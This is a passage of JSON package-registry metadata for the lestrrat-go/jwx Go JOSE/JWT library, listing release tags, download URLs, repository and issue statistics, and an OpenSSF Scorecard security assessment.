go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.205Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.084953491875412,"dependent_packages_count":5.702990755173129,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.893972123524271},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Fconcatkdf/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4260450,"name":"github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/jws/internal/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-01-22T08:35:55.519Z","latest_release_number":null,"last_synced_at":"2026-06-08T13:39:45.004Z","created_at":"2022-04-13T00:49:00.766Z","updated_at":"2026-06-08T13:39:45.005Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","install_command":"go get github.com/lestrrat-go/jwx/jws/internal/cmd/genheader","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jws/internal/cmd/genheader#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-1